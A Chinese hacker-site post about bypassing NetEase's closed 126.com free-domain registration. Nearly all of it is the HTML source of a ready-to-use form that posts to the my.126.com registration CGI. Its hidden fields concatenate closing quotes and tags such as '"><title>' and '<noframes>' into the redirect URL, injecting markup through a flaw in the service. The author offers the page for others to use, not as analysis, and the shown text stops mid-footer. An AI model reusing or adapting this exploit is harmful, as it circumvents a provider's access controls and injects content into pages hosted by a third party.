信息来源:六扇門
Www.X2s.org
最近研究些东西需要一个126.com的域名...好象网易现在停止注册了?!
还好有个好心的朋友把自己的域名共享了出来,不过总觉得用着不怎么方便.
后来发现了程序的漏洞,连夜搞了个小程序出来.源代码如下:
[code]<!-- Welc0me 7o f2s' blog-->
<!-- Power By:f2s-->
<!-- System by:f2s'blog-->
<!--
Http://www.x2s.org-->
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta http-equiv="MSThemeCompatible" content="Yes">
<META NAME="keywords" CONTENT="六扇門,幽居,OSG,黑客,安全,网安,NETF2S,F2S,SAFER,SAFE,
DSDOS,DOS,WEBSITE,WINDOWS,LINUX,HACKBASE,JANKER
COM,ORG,NET,SEA,BEYOND,GIF,JPG,BMP,HONKER,LOVE,DDOS,漏洞,脚本,游戏,爱情,音乐
,图片,MID,HACKER,红客,外挂,留言本,论坛,BBS,MUSIC,GIF,FLASH,SQL">
<META NAME="description" CONTENT="六扇門,幽居是枫三少的个人主页">
<title>绕过126.COM域名注册限制脚本利用程序 --- 六扇門 Power By:枫三少</title>
<!--
http://www.x2s.org Power By:f2s -->
<bgsound src="
http://www.x2s.org/jhu.mid" loop="-1">
<link href="
http://www.x2s.org/guestbook/style/default.css" rel="stylesheet"
type="text/css">
<table width="450" border=0 align="center" cellpadding=0 cellspacing=0
bordercolor="#111111">
<tr>
<td width="100%" height="1"><img src="
" width=450
border="0"></td>
</tr>
<tr>
<td width="100%" height="5"></td>
</tr>
</tr>
</table>
<!-- Begin NetEase'URL BUG System Power By:f2s-->
<div id="toolTipLayer" style="position:absolute; visibility: hidden"></div>
<div align="center">
<center>
<table border="1" cellspacing="0" style="border-collapse: collapse" bordercolor="#999999"
width="450" cellpadding="2">
<tr><td>
<div id=MagicFace style="Z-INDEX: 99; VISIBILITY: hidden; POSITION: absolute"></div>
<script language=JavaScript>ShowMagicFace('mf_008');</script>
<img name='HideImage' src='' width='2' height='4' alt='' style='background-
color: #FFFFFF'><BLOCKQUOTE>
<FORM onsubmit=changeaction(this) action=http://my.126.com/cgi-bin/register method=post>
<P><B>原理:</B>网易域名CGI申请程序漏洞</P>
<P><b>程序:</b>枫三少 <B>来源:</b>六扇門</P>
<P><B>演示:</B><A href="
http://x2s.126.com/">
http://x2s.126.com</A></P>
<P><B>域名:</B><INPUT title=请填写您想申请的域名 size=14 name=username> <select class=put
name=domain> <OPTION value=126.com>.126.com<OPTION value=yeah.net
selected>.yeah.net</OPTION></select> <BR><B>密码:</B><INPUT title=请填写您的密码
type=password name=password> <BR><B>密码:</B><INPUT title=重复密码以便确定 type=password
name=password2> <BR><B>邮箱:</B><INPUT title=请填写您的邮箱地址 size=30
value=yourname@x2s.org name=email> <BR><B>乱填:</B><INPUT title=这是代码漏洞入口,可以乱填。
style="HEIGHT: 20px"
onchange=url.value=page.value+bb4.value+bb1.value+titles.value+bb2.value+load.value+bb3.valu
e size=30 name=titles>* 必须中文 <BR><B>乱填:</B><INPUT title=这是代码漏洞入口2,可以乱填。
onchange=url.value=page.value+bb4.value+bb1.value+titles.value+bb2.value+load.value+bb3.valu
e size=30 name=load>* 必须中文 <BR><B>转向:</B><INPUT title=请填写您想转向的主页地址
onchange=url.value=page.value+bb4.value+bb1.value+titles.value+bb2.value+load.value+bb3.valu
e size=30 value=http://www.x2s.org name=page> <INPUT type=hidden
onchange=url.value=page.value+bb4.value+bb1.value+titles.value+bb2.value+load.value+bb3.valu
e value='"' name=bb4> <INPUT type=hidden
onchange=url.value=page.value+bb4.value+bb1.value+titles.value+bb2.value+load.value+bb3.valu
e value="><title>" name=bb1> <INPUT type=hidden
onchange=url.value=page.value+bb4.value+bb1.value+titles.value+bb2.value+load.value+bb3.valu
e value="</title><body><br><center><font style=font-size:9pt><font face=verdana>" name=bb2>
<INPUT type=hidden
onchange=url.value=page.value+bb4.value+bb1.value+titles.value+bb2.value+load.value+bb3.valu
e value="</font></body></HTMl><noframes>x2s.126.com" name=bb3> <INPUT type=hidden size=30
name=url> </P>
<P align=center>
<SCRIPT language=vbscript src=""></SCRIPT>
<INPUT class=p1 onmousedown="this.style.background='#FFFFFF';"
onmouseover="this.style.background='#F2F2F2';" style="BORDER-TOP-WIDTH: 1px; BORDER-LEFT-
WIDTH: 1px; FONT-SIZE: 9pt; BACKGROUND: #dedede; BORDER-BOTTOM-WIDTH: 1px; WIDTH: 80px;
HEIGHT: 22px; BORDER-RIGHT-WIDTH: 1px" onmouseout="this.style.background='#DEDEDE';"
type=submit value=现在提交 name=ok> <INPUT class=p1
onmousedown="this.style.background='#FFFFFF';"
onmouseover="this.style.background='#F2F2F2';" style="BORDER-TOP-WIDTH: 1px; BORDER-LEFT-
WIDTH: 1px; FONT-SIZE: 9pt; BACKGROUND: #dedede; BORDER-BOTTOM-WIDTH: 1px; WIDTH: 80px;
HEIGHT: 22px; BORDER-RIGHT-WIDTH: 1px" onmouseout="this.style.background='#DEDEDE';"
type=reset value=重填一次 name=B2> </P></FORM></BLOCKQUOTE>
<Tr>
<table border="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#999999"
width="450" cellpadding="0">
<P></P>
<P><B>注意:</B>注册成功后,需在网易免费域名 <A href="
http://my.126.com/"
target=_blank>
http://my.126.com/</A>修改激活网站转向地址</P>
<P><B>版权:</B><A href="
http://x2s.126.com" title="欢迎光临枫三少的小
站">
http://www.x2s.org</A> & ... ker.Com.Cn &nb
sp<B>Mail2:</b><a href="mailto:f2s@hackbase.com">F2s#HackBase.Com</b></P>
</table>
</div>
<!-- End System -->
<!-- Begin Table Power By:f2s -->
<table width="600" height="5" border="0" align="center" cellpadding="0" cellspacing="0"
class="footerbg">
<tr>
<td >
</td>
</tr>
</table>
<!-- End Table -->
<!-- Begin Footer Power By:f2s -->
<div align="center">
<center>
<table border="1" cellspacing="0" style="border-collapse: collapse" bordercolor="#999999"
width="450" cellpadding="2">
<tr>
<td width="80%" bgcolor="#CCCCCC">
<p align="center"><font color="#666666">
<font color="#000000">Copyright
